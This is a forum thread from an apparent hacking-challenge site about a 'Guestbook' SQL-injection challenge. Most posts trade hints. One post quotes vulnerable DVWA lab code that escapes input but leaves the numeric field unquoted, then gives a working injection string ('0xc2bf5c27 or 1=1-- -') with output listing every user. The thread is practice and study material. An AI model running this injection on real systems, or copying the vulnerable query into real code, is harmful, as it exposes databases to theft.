Username: 
Password: 
Restrict session to IP 

The Guesbook  Go to the The Guestbook challenge

1 2
Global Rank: 5
Totalscore: 549544
Posts: 220
Thanks: 227
UpVotes: 231
Registered: 15y 35d






Last Seen: 17h 51m
The User is Offline
RE: The Guesbook
Google/translate3Thank You!3Good Post!1Bad Post! link
Another game of "spot the error"... Nice distraction with the indentation. ;)
You're not sending the full request to the server.
Try reformatting your code.
line 14
echo $out1
You're a busy clicker Drool


You might also run into problems with checking eof in combination with HTTP/1.1, because the connection isn't closed immediately.
Last edited by tehron - Mar 06, 2012 - 13:23:15
Global Rank: 229
Totalscore: 93001
Posts: 1680
Thanks: 1358
UpVotes: 920
Registered: 16y 281d




Last Seen: 6s
The User is Online
RE: The Guesbook
Google/translate1Thank You!1Good Post!0Bad Post! link
Nice post, tehron.

I can see the error you have spotted now as well, and i actually looked for these myself, but it had to be in the last concat of course, when eyes are lazy.

Cheers!
The geeks shall inherit the properties and methods of object earth.
Global Rank: 15605
Totalscore: 83
Posts: 3
Thanks: 1
UpVotes: 0
Registered: 11y 195d
Last Seen: 11y 34d
The User is Offline
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
Hi Gizmore, I am able to bypass the mysql_escape_string() in my simulation lab (based on DVWA), encoding the '\' but can't bypass your guesbook with the same injection...Can you give us some hint?
Thanks in advance.
Global Rank: 229
Totalscore: 93001
Posts: 1680
Thanks: 1358
UpVotes: 920
Registered: 16y 281d




Last Seen: 6s
The User is Online
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
Maybe give us a hint how to bypass mysql_real_escape_string nowadays Euh

I call "impossibru"!

Smile
The geeks shall inherit the properties and methods of object earth.
Global Rank: 15605
Totalscore: 83
Posts: 3
Thanks: 1
UpVotes: 0
Registered: 11y 195d
Last Seen: 11y 34d
The User is Offline
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
As I said, in DVWA (mysql 5.5):
Code behind:
$id = trim($_GET['id']);
$id = mysql_real_escape_string($id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors


Injection chain ID: 0xc2bf5c27 or 1=1-- - (i.e. ¿\' or 1=1-- -, though also works without the ' (0x27)

Results:
ID: char(0xc2bf5c27) or 1=1-- -
First name: admin
Surname: admin

ID: char(0xc2bf5c27) or 1=1-- -
First name: Gordon
Surname: Brown

ID: char(0xc2bf5c27) or 1=1-- -
First name: Hack
Surname: Me

ID: char(0xc2bf5c27) or 1=1-- -
First name: Pablo
Surname: Picasso

ID: char(0xc2bf5c27) or 1=1-- -
First name: Bob
Surname: Smith

I am a bit confused about this challenge (I also have been considering a cookie injection but..)
Thanks Smile
Global Rank: 229
Totalscore: 93001
Posts: 1680
Thanks: 1358
UpVotes: 920
Registered: 16y 281d




Last Seen: 6s
The User is Online
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
Maybe you should take a look at the challenge's code Smile
The geeks shall inherit the properties and methods of object earth.
1 2
jacobs, Redknee, tunelko, silenttrack, n0tHappy, nonfungiblesecurity, quangntenemy, TheHiveMind, Z, balicocat, Ge0, samuraiblanco, arraez, jcquinterov, hophuocthinh, alfamen2, burhanudinn123, Ben_Dover, stephanduran89, braddie0, SwolloW, dangarbri, csuquvq have subscribed to this thread and receive emails on new posts.
1 people are watching the thread at the moment.
This thread has been viewed 186434 times.